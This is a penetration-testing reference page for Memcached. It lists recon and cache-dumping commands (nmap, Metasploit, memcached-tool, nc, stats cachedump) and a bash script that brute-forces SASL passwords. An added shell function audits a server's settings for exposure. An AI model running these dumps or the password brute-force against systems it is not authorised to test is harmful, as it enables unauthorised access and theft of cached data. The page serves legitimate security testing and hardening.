Memcached

  • Recon


Memcached listens on port 11211 by default.

 

Nmap

Reconnaissance with nmap:

nmap -p 11211 --script memcached-info x.x.x.x

 

Metasploit

Metasploit module to extract data stored in the cache:

auxiliary/gather/memcached_extractor

 

memcached-tool

# /usr/share/memcached/scripts/memcached-tool
memcached-tool 10.0.0.5:11211 dump

 

libmemcached-tools

memcstat --servers=x.x.x.x
memcdump --servers=x.x.x.x
memcat --servers=x.x.x.x key_to_retrieve

 

Login

telnet x.x.x.x 11211
echo -e 'stats items' | nc -q1 x.x.x.x 11211

 

Cache dump

stats slabs
stats cachedump 1 100

 

Recover data from warm cache

lru_crawler metadump all

 

Brute force

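#!/bin/bash

# Read candidate passwords line by line from the wordlist passed as $1.
# IFS= and -r keep leading spaces and backslashes in each password intact.
while IFS= read -r p; do
  # memcstat prints a "Server:" block only when the SASL login succeeds
  if memcstat --servers=x.x.x.x --username=administrator --password="$p" | grep -q Server; then
    echo "Password found $p"
    break
  fi
done < "$1"

# Usage: ./script.sh passwords.txt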
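
Hardening check

The commands above only work when the port is reachable and SASL is off or weakly protected. As an added example (not from the original page), this function reads the reply to `stats settings` from your own server and flags the `inter`, `udpport` and `auth_enabled_sasl` values that leave it exposed; the finding names and the sample reply are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag risky values in `stats settings` output read from stdin.

# Constructed sample reply; memcached ends every line with CRLF.
sample_settings() {
  printf 'STAT tcpport 11211\r\nSTAT udpport 11211\r\n'
  printf 'STAT inter NULL\r\nSTAT auth_enabled_sasl no\r\nEND\r\n'
}

# Prints a space-separated list of findings, "OK", or "NO_DATA".
# The finding names are labels chosen for this example.
audit_memcached_settings() (
  cr=$(printf '\r')
  inter= udpport= sasl= findings=
  while IFS= read -r line || [ -n "$line" ]; do
    line=${line%"$cr"}              # strip the trailing CR
    case $line in
      "STAT "*) line=${line#STAT } ;;
      *) continue ;;                # skip END / ERROR / blank lines
    esac
    key=${line%% *}
    val=${line#* }
    case $key in
      inter)             inter=$val ;;
      udpport)           udpport=$val ;;
      auth_enabled_sasl) sasl=$val ;;
    esac
  done
  if [ -z "$inter$udpport$sasl" ]; then
    echo NO_DATA                    # nothing parsed: do not report "OK"
    return 0
  fi
  # inter is NULL when no -l option was given (bind to all interfaces)
  case $inter in
    NULL|0.0.0.0|::|'*') findings="$findings WIDE_BIND" ;;
  esac
  # udpport 0 means the UDP listener is off
  case $udpport in
    ''|0) ;;
    *) findings="$findings UDP_ENABLED" ;;
  esac
  # without SASL, anyone who can reach the port can read the cache
  case $sasl in
    ''|yes) ;;
    *) findings="$findings NO_SASL" ;;
  esac
  echo "${findings:-OK}" | sed 's/^ //'
)

sample_settings | audit_memcached_settings
```

Feed it live data with: echo 'stats settings' | nc -q1 x.x.x.x 11211 | audit_memcached_settings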